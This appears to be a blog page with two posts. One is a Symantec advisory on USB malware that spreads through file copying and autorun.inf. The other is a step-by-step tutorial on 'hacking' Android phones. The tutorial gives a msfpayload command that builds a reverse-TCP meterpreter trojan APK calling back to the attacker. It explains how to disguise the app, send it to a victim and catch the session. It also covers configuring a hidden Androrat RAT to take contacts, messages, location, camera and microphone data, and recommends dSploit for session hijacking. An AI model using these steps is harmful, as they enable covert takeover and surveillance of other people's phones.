Increase in USB-Based Malware Attacks

Symantec is currently observing an increase in malicious applications that use USB flash drive devices as a propagation method. Just as a clarification for any of our readers that are not familiar with the term “USB flash drive,” a USB flash drive is typically a removable portable storage device that uses a USB (universal serial bus) port to interface to a computer. USB ports are part of most modern computers and they are designed to allow many peripherals to be easily connected (plug-and-play) to a computer through a standardized interface. These USB flash drive storage devices are very useful and are becoming fairly ubiquitous in the workplace.

The USB flash drive storage medium is designed to be portable, making it easy to connect to many computers in its lifetime. This, unfortunately, exposes the flash drive to the risk of infection. There are many malicious applications that propagate simply by making a copy of themselves on all drives that are attached to a computer. The portability of the USB device and its small form factor can also make it easy for attackers to plug it into computers that they have limited physical access to, potentially granting them remote access at a later time.

At the moment, there are two popular methods that malicious applications use to infect USB flash drives:

Simple file copy method

With this method, a malicious application that is installed on an infected computer simply makes copies of itself to all storage devices that are attached to the infected computer. A copy of the malicious code will be placed on network shares, local drives, and removable media (such as USB flash drives) that are connected to the computer. Usually the malicious application will also attempt to copy itself to peer-to-peer (P2P) file-sharing shared folders as well. With this method, a malicious file is often named with a sensational filename to lure a victim into launching the file and causing malicious code to be executed. Quite often there are familiar file icons such as Microsoft Windows icons for videos and images that are used to trick unsuspecting victims into thinking that an executable file is a harmless image or video. This infection method requires that the victim manually execute the malicious file from their computer to become infected.

AutoRun.inf modification method
Microsoft Windows and some other operating systems have a functionality that is called “AutoRun” (sometimes also referred to as Autoplay). AutoRun functionality is basically designed to perform some actions that are automatically executed when removable media is inserted or removed from a computer.

On Microsoft Windows platforms, “autorun.inf” is the file that contains instructions for the AutoRun functionality. The autorun.inf file can instruct AutoRun to use a certain type of icon; add menu commands; and among other things, start an executable.

With this infection method, the malicious application modifies or creates an autorun.inf file on all of the network shares, local drives, and removable media (including USB flash drives) that are connected to the computer. When an infected USB flash drive is inserted into another computer, the copy of the malicious application is automatically executed. Under a default configuration of Windows, this infection method does not require any interaction from the victim other than physically attaching the media to the computer.

Increasing trend of drive-infecting malicious code

Symantec has recently observed that both of the above methods are becoming an increasingly popular propagation method for malicious code. We have noticed the following percentile increase in several pieces of malicious code that Symantec antivirus currently blocks:

 

This trend is substantiated in vol. XIII of the Symantec Internet Security Threat Report (quoted from page 56, Propagation mechanisms subsection of the Malicious Code Trends section):

"In the second half of 2007, 40 percent of malicious code that propagated did so as shared executable files (table 9), a significant increase from 14 percent in the first half of 2007. Shared executable files are the propagation mechanism employed by viruses and some worms that copy themselves to removable media. As stated in the “Malicious code types” section above, the increasing use of USB drives and media players has resulted in a resurgence of malicious code that propagates through this vector. This vector lost popularity among malicious code authors when the use of floppy disks declined and attackers instead concentrated on other more widely used file transfer mechanisms such as email and shared network drives. However, as use of removable drives has become more widespread, attackers have again begun to employ this propagation technique. Although current removable drives differ from floppy disks, the principle remains the same, enabling attackers to make simple modifications to old propagation techniques.”

Read More

How to Hack an android phone

Note – I will not be held responsible for anybodies actions , as this tutorial is for educational purposes.

Method 1 (Create your own Rat apk file)

You will need backtrack or kali-linux ,it’s available on their site for free at http://www.kali.org/downloads/.    Open up your new operating system using VMWare or by making a bootable USB. Here’s the 2 tools that you will need, either way will work.

VMWare workstation

RUFUS

When you have successfully booted into the OS , simply click the first option ” Default boot text mode ” and then a window will pop up that looks similar to command prompt. Type in ” startx ” and you will be in the GUI of the OS. Now we can finally start with the hacking phase. First go to the terminal. Type in the following commands.

1. apt-get update   ( make sure you are connected to the internet)

2. msfconsole

wait until the command fully loaded ( depends on your pc specs , it can take some time)

3. Execute this command in metasploit console

 Msfpayload android/meterpreter/reverse_tcp LHOST=<your internal IP> LPORT=<port for connection> R > trojan.apk
4. Then transfer trojan.apk to your android device and install APK Editor from google play to edit  the trojan.apk ( change icon and names ) so   that it looks like a legitimate app.

5. Send this apk file over to your victim’s phone.
6. Now going back to your open msfconsole window , type in the following to start your trojan.apk
7. use exploit/multi/handler
8. set lport < the port you used in trojan.apk >
9. exploit

Note – ** Don’t forget to make your IP static, as you don’t want your ip to change otherwise this won’t work **

And viola !! , you now have control of your victims phone.

You can access the victims directories , front-back camera and many more.

Method 2 ( Using Androrat )

Androrat is a client/server application developed in Java Android for the client side and in Java/Swing for the Server.The name Androrat is a mix of Android and RAT (Remote Access Tool).The goal of the application is to give the control of the android system remotely and retrieve informations from it.

Features

• Get contacts (and all theirs informations)
• Get call logs
• Get all messages
• Location by GPS/Network
• Monitoring received messages in live
• Monitoring phone state in live (call received, call sent, call missed..)
• Take a picture from the camera
• Stream sound from microphone (or other sources..)
• Streaming video (for activity based client only)
• Do a toast
• Send a text message
• Give call
• Open an URL in the default browser
• Do vibrate the phone

How to configure Androrat :

1. You have to  make a id on Here and create a host.
2. You need to open port you want to use.  To do that Open Control panel > Network & Internet > Network & Sharing centre Then click on see full map option Right-Click on the Gateway or router>Properties In general tab, Go to settings , Click on add In Description of service , Write Androrat Now you have to check your ip, To Do this , open command prompt, type ipconfig, Scroll To ethernet Adapter local area connection,and note down the ipv4 address Now come back to Add window , in the name or ip address type the ipv4 address you have noted Now in the external & internal port number , type 81 , tcp should be selected, click ok Now click on Add button again…Now in Description , write androrat 1 In the name or ip address, type the ipv4 address you have noted Now in the external & internal port number , type 81 , udp should be selected, click ok.
3. Now extract the file , Open AndroRat Binder.exe.
4. Go to No-ip tab and fill your information & click on update.
5. Go to Build Tab.
6. In IP section, type the hostname  you have created by no-ip.
7. In port section , type 81.
8. In apk title ,Type any title you want.
9. Check the hidden box to hide the apk from mobile’s app drawer.
10. Click on Go.
11. Now you will see the apk with the title you have given in the extracted folder.
12. Now install that apk to any android mobile phone.
13. You will find a folder named Androrat in the extracted files.
14. Open Androrat>Androrat.jar (you should have java installed in your pc to open it).
15. Now click on server> Select port and enter 81, click ok & restart it.
16. Now , as soon as the android client is online , you will find it on the jar file ……select any server online.
17. Enjoy.

Download Androrat

Method 3 ( Using Dsploit )
For this hack app to work ,you need to be on the same network as the victim.
So what does this app have to offer? Just about everything. Password recovery , kill connections , Session hijacker (facebook , youtube etc.) , site re-director , image replacer and many more.
Simply download the app and install. You will be amazed how much power this app provides.
Download Dsploit

Read More